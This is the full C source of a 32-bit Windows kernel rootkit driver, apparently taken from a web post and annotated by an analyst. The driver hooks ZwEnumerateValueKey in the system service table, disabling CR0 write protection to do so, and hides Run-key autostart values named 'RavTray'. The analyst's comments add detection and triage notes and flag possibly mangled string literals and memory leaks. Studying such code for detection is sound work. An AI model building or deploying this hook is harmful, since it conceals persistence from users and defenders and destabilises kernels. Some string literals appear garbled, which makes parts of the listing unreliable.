// A simple driver that hides a registry value, implemented by hooking
// ZwEnumerateValueKey; the code is posted here.
//
// Analyst summary of the listing:
//   - DriverEntry calls HookApi, which replaces the system-service-table slot
//     for ZwEnumerateValueKey with MyZwEnumerateValueKey and keeps the previous
//     pointer in RealZwEnumerateValueKey.
//   - MyZwEnumerateValueKey forwards every call to the saved routine and, for
//     one hard-coded key path, skips any entry whose name contains HideValue.
//   - DriverUnload calls UnHook, which writes the saved pointer back.
//
// Detection and triage notes:
//   - While the driver is loaded, the table slot points into this driver
//     rather than into the kernel image; checking service-table entries
//     against the kernel image's address range exposes the hook.
//   - Only index-based value enumeration is filtered. No other registry
//     service is hooked in this listing, so reading the value by name, or
//     parsing the hive file offline, should still show it (cross-view check).
//   - The listing relies on MSVC `_asm` blocks and on the imported
//     KeServiceDescriptorTable symbol, so it targets 32-bit x86 kernels only.
//     64-bit Windows does not export that symbol and Kernel Patch Protection
//     guards the table.
//   - NOTE(review): string literals are kept exactly as they appear on the
//     page; the web extraction may have altered escape characters, so compare
//     against an original copy before relying on them for analysis.
#include <ntddk.h>
#include <stdio.h>

// Declaration of ObQueryNameString (used below to obtain the name of a key object).
NTSYSAPI NTSTATUS NTAPI ObQueryNameString(
    IN PVOID Object,
    OUT PVOID ObjectNameInfo,
    IN ULONG Length,
    OUT PULONG ReturnLength
);

// Declaration of ZwEnumerateValueKey (the service whose table slot is replaced).
NTSYSAPI NTSTATUS NTAPI ZwEnumerateValueKey(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    OUT PVOID KeyValueInformation,
    IN ULONG Length,
    OUT PULONG ResultLength
);

// Prototype of the replacement routine; same parameter list as ZwEnumerateValueKey.
NTSTATUS MyZwEnumerateValueKey(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    OUT PVOID KeyValueInformation,
    IN ULONG Length,
    OUT PULONG ResultLength
);

// Function-pointer type for the original routine; it returns NTSTATUS.
typedef NTSTATUS (*REALZWENUMERATEVALUEKEY)(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    OUT PVOID KeyValueInformation,
    IN ULONG Length,
    OUT PULONG ResultLength
);

// Saved pointer to the original routine; set by HookApi, written back by UnHook.
REALZWENUMERATEVALUEKEY RealZwEnumerateValueKey=NULL;

// The value name to hide. The author hides the autostart entry of the Rising
// antivirus product and notes that the name can be changed to something else.
// It is matched with wcsstr below, i.e. as a substring of the value name.
PWSTR HideValue=L"RavTray";

// Layout used to read the kernel's service descriptor table. Only
// ServiceTableBase is referenced in this listing (through SYSCALL).
#pragma pack(1)
typedef struct ServiceDescriptorEntry{
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int *NumberOfServices;
    unsigned char *ParamTableBase;
}ServiceDescriptorTableEntry_t,*PServiceDescriptorTableEntry_t;
#pragma pack()

_declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

// Yields the service-table slot for a Zw* export: a ULONG is read at byte
// offset 1 of the function and used as the index into ServiceTableBase.
// Presumably this is the service number encoded in the stub's first
// instruction on 32-bit x86 - TODO confirm against the target kernel.
#define SYSCALL(_function) KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)_function+1)]

NTSTATUS HookApi();
NTSTATUS UnHook();
PVOID GetPointer(HANDLE handle);
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject);

// Resolves a handle to its object pointer. Returns NULL for a zero handle or
// when ObReferenceObjectByHandle does not return STATUS_SUCCESS.
// The call passes access mask 0, no object type and KernelMode. No matching
// dereference appears anywhere in this listing, so each successful call leaves
// one extra reference on the object (an observable side effect on a hooked
// machine).
PVOID GetPointer(HANDLE handle)
{
    PVOID pKey;
    if(!handle) return NULL;
    if (ObReferenceObjectByHandle(handle,0,NULL,KernelMode,&pKey,NULL)!=STATUS_SUCCESS)
    {
        pKey=NULL;
    }
    return pKey;
}

// Replacement installed in the ZwEnumerateValueKey slot.
// Parameters are passed unchanged to the saved original routine. The return
// value is always the NTSTATUS of a call to the original routine: with Index+1
// when the filter matched, otherwise with the caller's Index.
NTSTATUS MyZwEnumerateValueKey(
    IN HANDLE KeyHandle,
    IN ULONG Index,
    IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
    OUT PVOID KeyValueInformation,
    IN ULONG Length,
    OUT PULONG ResultLength
)
{
    PVOID pKey;
    UNICODE_STRING *pUniName;
    ULONG actuallen;
    UNICODE_STRING uStrValueName;   // not used in this function
    ANSI_STRING keyname;
    NTSTATUS status;
    PWSTR ValueName;
    ULONG NameLen;                  // not used in this function

    // First call to the original routine fills the caller's buffer. Its
    // status is stored but never examined or returned.
    status=((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
        KeyHandle,
        Index,
        KeyValueInformationClass,
        KeyValueInformation,
        Length,
        ResultLength);
    pKey=GetPointer(KeyHandle);

    if (pKey)
    {
        // 2048-byte nonpaged allocation per call. The result is used without a
        // NULL check and no free appears in this listing, so nonpaged pool
        // usage grows with every enumeration call (a triage indicator).
        pUniName=ExAllocatePool(NonPagedPool,1024*2);
        pUniName->MaximumLength=512*2;
        // Zeroes the first 1024 bytes of the allocation, header included.
        memset(pUniName,0,pUniName->MaximumLength);
        if(NT_SUCCESS(ObQueryNameString(pKey,pUniName,512*2,&actuallen)))
        {
            // TRUE asks the routine to allocate keyname.Buffer; it is not
            // released anywhere in this listing.
            RtlUnicodeStringToAnsiString(&keyname,pUniName,TRUE);

            // Prints the name of every enumerated key to the debugger output,
            // which is itself visible to a kernel debug-output viewer.
            DbgPrint("%ws/n",pUniName->Buffer);
            // Upper-case the ANSI copy so the comparison below ignores case.
            keyname.Buffer=_strupr(keyname.Buffer);

            // Filter applies to exactly one key path (literal kept as shown on the page).
            if (strcmp(keyname.Buffer,"//REGISTRY//MACHINE//SOFTWARE//MICROSOFT//WINDOWS//CURRENTVERSION//RUN")==0)
            {
                // The caller's buffer is read as KEY_VALUE_FULL_INFORMATION
                // without checking KeyValueInformationClass or the status of
                // the first call.
                // NOTE(review): wcsstr expects a NUL-terminated string; whether
                // Name is terminated here is not shown - TODO confirm.
                ValueName =((PKEY_VALUE_FULL_INFORMATION)KeyValueInformation)->Name;
                if (ValueName!=NULL&&wcsstr(ValueName,HideValue)!=NULL)
                {
                    // Hide the match by returning the entry at the next index
                    // instead. The caller's own index sequence is not adjusted,
                    // so the entry after the hidden one is returned for two
                    // consecutive indices - a duplicate a cross-view check can spot.
                    Index++;
                    ValueName=NULL;
                    return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
                        KeyHandle,
                        Index,
                        KeyValueInformationClass,
                        KeyValueInformation,
                        Length,
                        ResultLength);
                }
                //DbgPrint("ValueName=%ws/n",ValueName);

            }
        }
    }

    // No match: the original routine is called a second time with the
    // unchanged Index and that result is what the caller receives.
    return ((REALZWENUMERATEVALUEKEY)(RealZwEnumerateValueKey))(
        KeyHandle,
        Index,
        KeyValueInformationClass,
        KeyValueInformation,
        Length,
        ResultLength);

}

// Installs the hook: saves the current table slot, then overwrites it with
// MyZwEnumerateValueKey. Always returns STATUS_SUCCESS.
NTSTATUS HookApi()
{
    RealZwEnumerateValueKey = (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey);
    // Clear bit 16 (10000h, write protect) of CR0 so the following store to
    // the table is permitted.
    _asm{
        mov eax,cr0
        and eax,not 10000h
        mov cr0,eax
    }

    (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey)=MyZwEnumerateValueKey;
    // Set bit 16 of CR0 again.
    _asm{

        mov eax,cr0
        or eax,10000h
        mov cr0,eax
    }
    return( STATUS_SUCCESS );
}

// Removes the hook: same CR0 sequence as HookApi, writing the saved original
// pointer back into the table slot. Always returns STATUS_SUCCESS.
NTSTATUS UnHook()
{
    _asm{
        mov eax,cr0
        and eax,not 10000h
        mov cr0,eax
    }
    (REALZWENUMERATEVALUEKEY)SYSCALL(ZwEnumerateValueKey) = RealZwEnumerateValueKey;
    _asm{

        mov eax,cr0
        or eax,10000h
        mov cr0,eax
    }
    return STATUS_SUCCESS ;
}

// Unload routine registered in DriverEntry: logs a message, restores the
// table slot through UnHook and returns its status.
NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    NTSTATUS status;
    DbgPrint("OnUnload called!/n");
    status=UnHook();
    return status;
}

// Driver entry point: registers DriverUnload, installs the hook and logs a
// message. The return value of HookApi is ignored; STATUS_SUCCESS is returned
// unconditionally. theRegistryPath is not used.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT theDriverObject,
    IN PUNICODE_STRING theRegistryPath)
{

    theDriverObject->DriverUnload=DriverUnload;
    HookApi();
    DbgPrint("Hook Called!/n");
    return STATUS_SUCCESS ;
}